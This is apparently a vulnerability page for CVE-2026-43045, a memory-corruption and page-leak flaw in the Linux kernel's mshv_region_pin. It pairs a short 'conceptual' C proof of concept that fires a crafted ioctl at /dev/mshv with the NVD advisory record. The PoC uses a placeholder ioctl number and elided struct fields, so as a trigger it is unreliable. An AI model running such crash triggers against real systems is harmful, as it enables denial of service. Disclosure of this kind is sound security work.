CVE-2026-43045

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Conceptual PoC for CVE-2026-43045 // This code attempts to trigger the vulnerability in mshv_region_pin // by invoking the ioctl with crafted parameters. #define MSHV_IOCTL_PIN_REGION 0x1234 // Example IOCTL number struct mshv_pin_region_args { unsigned long addr; unsigned long size; // ... other fields ... }; int main() { int fd; struct mshv_pin_region_args args; // Open the mshv device (requires appropriate privileges or access) fd = open("/dev/mshv", O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } // Craft arguments to potentially trigger short pin or error // Using a very large size or unmapped address might trigger the path args.addr = (unsigned long)malloc(4096); args.size = 0xFFFFFFFF; // Large size to stress pin_user_pages_fast printf("Attempting to trigger vulnerability...\n"); // Invoke the vulnerable ioctl if (ioctl(fd, MSHV_IOCTL_PIN_REGION, &args) < 0) { perror("IOCTL failed (expected if system patched or conditions not met)"); } else { printf("IOCTL succeeded. Check kernel logs for memory corruption.\n"); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-43045", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:50.817", "lastModified": "2026-05-08T14:04:13.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix error handling in mshv_region_pin\n\nThe current error handling has two issues:\n\nFirst, pin_user_pages_fast() can return a short pin count (less than\nrequested but greater than zero) when it cannot pin all requested pages.\nThis is treated as success, leading to partially pinned regions being\nused, which causes memory corruption.\n\nSecond, when an error occurs mid-loop, already pinned pages from the\ncurrent batch are not properly accounted for before calling\nmshv_region_invalidate_pages(), causing a page reference leak.\n\nTreat short pins as errors and fix partial batch accounting before\ncleanup."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.19.12", "matchCriteriaId": "53D0D203-C2F0-46AD-8120-3BDF390DC90C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/a7d149152bc5a9119854331c57be35ad31fdf5cc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0e296f257671ba10249630fe58026f29e4804d9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}